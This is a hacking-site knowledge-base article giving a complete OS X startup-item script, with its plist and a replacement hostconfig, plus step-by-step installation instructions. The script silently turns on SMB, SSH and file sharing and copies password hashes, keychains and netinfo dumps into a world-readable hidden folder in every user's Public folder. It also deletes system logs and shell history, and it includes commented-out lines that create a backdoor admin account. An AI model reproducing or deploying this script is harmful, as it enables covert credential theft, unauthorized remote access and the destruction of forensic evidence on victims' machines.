..:: MacHacking.net ::..

Article from MacHacking.net Knowledge Base: http://kb.machacking.net

**********
Title: Sample OS X Startup Script
Author: DimBulb
Author Contact: marcmeadows100@hotmail.com
**********

This is an OS X startup item with a shell script to replace the current hostconfig file with a different copy (which has sharing turned on among other things.) It also copies a few files and the netinfo directory into the Public folder of every user folder. On the first reboot SMB sharing will be turned on and the information copied to the .info folder will contain the Mac password hashes and the SMB/NT4 hashes which are easier to crack.

There are three textblocks below. Save each as a separate text file using the names specified for each textblock. Create a new folder called opener. Copy the three text files into that folder. Now place the folder in the /Library/StartupItems folder. Reboot.

If you don't want the appletalk hostname to change you could paste it into the new hostconfig file.

SAVE THIS AS A TEXT FILE CALLED opener
#! /bin/bash

# Opener script to turn on services and gather info
# You need an admin level user name and password or physical access (boot from a CD or firewire, ignore permissions on the internal drive) to install this
# It should go in /System/Library/StartupItems or /Library/StartupItems
# It should be in it's own folder - the script and the folder must have the exact same name
# there should be two other files in that folder, the StartupParameters.plist for this script and your version of the hostconfig file (named hostconfig)

# Make sure we can overwrite the hostconfig file
chmod 777 /etc/hostconfig
chflags nouchg /etc/hostconfig

# backup their hostconfig file
mv /etc/hostconfig /etc/hostconfigold.old

# copy our own file in as hostconfig
cp /Library/StartupItems/opener/hostconfig /etc/hostconfig

# create a hidden info folder and subfolders
mkdir /.info /.info/Library /.info/Library/Preferences /.info/private /.info/private/var /.info/keychains

# copy some interesting data and all the hashes into the info folder
cp -R /Library/ApplePasswordServer /.info/Library/ApplePasswordServer
cp -R /private/var/db /.info/private/var/db
cp -R /Library/Keychains/ /.info/Library/Keychains/
cp -R /Library/Preferences/DNSUpdate /.info/Library/Preferences/
cp /Library/WebServer/users /.info/Library/WebServer/users
cp /System/Library/CoreServices/SystemVersion.plist /.info/System/Library/CoreServices/SystemVersion.plist
cp /Library/Preferences/Netopia/Netopia\ Preferences /.info/Library/Preferences/Netopia/Netopia\ Preferences

# change to the info folder directory
cd /.info

# grab netinfo user stuff and the MD5 hashes (for . and /) if this is OS X 10.2.8 or lower
nidump passwd . > .nidump.txt
nidump passwd / > .nidump2.txt

# change to the Users folder
cd /Users

# find each user's keychain files and copy them out to the info folder
find . -maxdepth 3 -mindepth 3 -name "Keychains" -type d -exec cp -R '{}' /.info/keychains \;

# change permissions on the info folders and all the stuff we collected
chmod -Rf 777 /.info

# now copy the info folder into the Public folder of each user (since sharing will be on at restart and guest is on by default anyone can get to them)
find . -maxdepth 2 -name "Public" -type d -exec cp -R /.info '{}/.info' \;

# uncomment the lines below to create an admin user named Hacker with password 1234
# note, this user will appear in their SystemPreferences accounts list!
#niutil -create / /users/hacker
#niutil -createprop / /users/hacker uid 401
#niutil -createprop / /users/hacker realname "Hacker"
#niutil -createprop / /users/hacker home "/private/var/root"
#niutil -createprop / /users/hacker shell "/bin/bash"
#niutil -createprop / /users/hacker gid 20
#niutil -createprop / /users/hacker passwd "rQ3p5/hpOpvGE"

# uncomment the next 2 lines if you want everyone to have full access to managed preferences (due to simple finder issues for instance)
#chmod -f 777 /Library
#chmod -Rf 777 /Library/ManagedPreferences

# Clean up after ourselves by removing logs
rm -Rf /private/var/log/
rm -Rf /Library/Logs/
rm -f /Library/Preferences/Netopia/Timbuktu\ Pro\ Log
rm -f /var/log/osxvnc.*
find . -maxdepth 2 -name ".bash_history" -exec rm -f '{}' \;


SAVE THIS AS A TEXT FILE CALLED StartupParameters.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Description</key>
<string>opener</string>
<key>Hide</key>
<true/>
<key>Messages</key>
<dict>
<key>start</key>
<string>started</string>
<key>stop</key>
<string>stopped</string>
</dict>
<key>OrderPreference</key>
<string>None</string>
<key>Provides</key>
<array>
<string>opener</string>
</array>
<key>Requires</key>
<array>
<string>Resolver</string>
</array>
</dict>
</plist>



SAVE THIS AS A TEXT FILE CALLED hostconfig
##
# /etc/hostconfig
##
# This file is maintained by the system control panels
##
# Network configuration
HOSTNAME=-AUTOMATIC-
ROUTER=-AUTOMATIC-
# Services
AFPSERVER=-YES-
APPLETALK=-YES-
AUTHSERVER=-NO-
AUTOMOUNT=-YES-
CONFIGSERVER=-NO-
IPFORWARDING=-NO-
MAILSERVER=-NO-
NETBOOTSERVER=-NO-
NETINFOSERVER=-AUTOMATIC-
NISDOMAIN=-NO-
RPCSERVER=-AUTOMATIC-
TIMESYNC=-YES-
QTSSERVER=-NO-
SSHSERVER=-YES-
WEBSERVER=-YES-
CUPS=-YES-
DNSSERVER=-NO-
IPV6=-YES-
SMBSERVER=-YES-
APPLETALK_HOSTNAME=*41*


**********
Article from MacHacking.net Knowledge Base: http://kb.machacking.net